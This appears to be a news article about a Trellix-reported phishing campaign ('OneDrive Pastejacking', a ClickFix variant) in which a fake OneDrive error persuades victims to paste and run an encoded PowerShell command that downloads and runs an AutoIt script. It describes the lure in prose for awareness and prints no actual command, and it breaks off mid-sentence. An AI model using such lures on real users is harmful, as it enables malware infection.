Cybersecurity researchers from Trellix warn about a new phishing campaign designed to deploy a malicious PowerShell script.
Rafel Pen, a security researcher at Trellix, revealed that this campaign utilizes social engineering tactics to trick users into executing the PowerShell script, which can ultimately compromise their systems.
TRELLIX has identified this phishing campaign as OneDrive Pastejacking. The attack commences with an email containing an HTML file that, when opened, displays an image resembling a OneDrive page with an error message stating: “It was not possible to connect to the OneDrive cloud service. To fix the error, you must manually update the DNS cache.”
The message provides two options: “How to fix” and “details”. Clicking on “Details” redirects the user to the legitimate Microsoft Learn page to address DNS issues. However, clicking on “how to fix” initiates a series of steps, including opening the PowerShell terminal and executing a Base64-encoded command to supposedly resolve the error.
This command includes actions like “Ipconfig /Flushdns”, creating a folder named “downloads” on the C drive, downloading and extracting files, and executing a script using “Autoit3.exe”.
This campaign targets users in the USA, South Korea, Germany, India, Ireland, Italy, Norway, and Great Britain. Similar attacks are also being monitored by reliaquest, proofpoint, and McAfee Labs, indicating the rise in popularity of this phishing method, known as Clickfix.
This case underscores the importance of critical thinking, as cybercriminals continue to refine their tactics by exploiting people’s trust in reputable brands and their eagerness to quickly resolve technical issues.
Ensuring security involves not only using antivirus programs but also developing the ability to recognize suspicious activities, particularly when it involves executing unfamiliar commands on your device. Engaging in unnecessary technical commands often results